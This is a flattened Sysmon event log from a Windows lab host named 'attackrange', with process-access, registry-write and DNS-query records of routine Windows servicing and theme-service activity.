13:58:26.789{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x800000000000000011232Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localInvDB-DriverVerSetValue2021-01-18 13:58:26.789{59A5CD1D-8E46-6005-1200-00000000A301}1212C:\Windows\System32\svchost.exe\REGISTRY\A\{75980880-3470-ec82-7755-0f71170c6805}\Root\InventoryDevicePnp\swd/scdeviceenumbus/1\DriverVerVersion10.0.14393.0 13241300x800000000000000011231Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localInvDB-DriverVerSetValue2021-01-18 13:58:26.773{59A5CD1D-8E46-6005-1200-00000000A301}1212C:\Windows\System32\svchost.exe\REGISTRY\A\{75980880-3470-ec82-7755-0f71170c6805}\Root\InventoryDevicePnp\swd/scdeviceenumbus/0\DriverVerVersion10.0.14393.0 13241300x800000000000000011230Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localInvDB-DriverVerSetValue2021-01-18 13:58:26.773{59A5CD1D-8E46-6005-1200-00000000A301}1212C:\Windows\System32\svchost.exe\REGISTRY\A\{75980880-3470-ec82-7755-0f71170c6805}\Root\InventoryDevicePnp\terminput_bus/umb/2&2c22bcc9&0&session2mouse0\DriverVerVersion10.0.14393.0 10341000x800000000000000011229Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:26.773{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011228Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:26.773{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x800000000000000011227Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localInvDB-DriverVerSetValue2021-01-18 13:58:26.773{59A5CD1D-8E46-6005-1200-00000000A301}1212C:\Windows\System32\svchost.exe\REGISTRY\A\{75980880-3470-ec82-7755-0f71170c6805}\Root\InventoryDevicePnp\terminput_bus/umb/2&2c22bcc9&0&session2keyboard0\DriverVerVersion10.0.14393.0 10341000x800000000000000011226Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:26.586{59A5CD1D-8E46-6005-1600-00000000A301}15444140C:\Windows\system32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+4689|c:\windows\system32\themeservice.dll+3fdd|c:\windows\system32\themeservice.dll+74a3|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011225Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:26.523{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011224Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:26.523{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 22542200x800000000000000011253Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:25.779{59A5CD1D-8E56-6005-2E00-00000000A301}2464crl.comodoca.com0::ffff:151.139.128.14;C:\Windows\sysmon64.exe 10341000x800000000000000011252Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:27.711{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011251Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:27.711{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011250Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:27.711{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011249Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:27.711{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011248Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:27.023{59A5CD1D-8E46-6005-1600-00000000A301}15444140C:\Windows\system32\svchost.exe{59A5CD1D-9402-6005-0605-00000000A301}3848C:\Windows\System32\unregmp2.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011247Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:27.023{59A5CD1D-8E46-6005-1600-00000000A301}15441576C:\Windows\system32\svchost.exe{59A5CD1D-9402-6005-0605-00000000A301}3848C:\Windows\System32\unregmp2.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011278Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:28.867{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011277Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:28.852{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011276Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:28.852{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011275Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:28.633{59A5CD1D-8E46-6005-1600-00000000A301}15444140C:\Windows\system32\svchost.exe{59A5CD1D-9404-6005-0705-00000000A301}4580C:\Windows\System32\rundll32.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011274Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:28.633{59A5CD1D-8E46-6005-1600-00000000A301}15441576C:\Windows\system32\svchost.exe{59A5CD1D-9404-6005-0705-00000000A301}4580C:\Windows\System32\rundll32.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011273Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:28.633{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011272Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:28.617{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011271Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:28.617{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011270Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:28.617{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011269Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:28.617{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 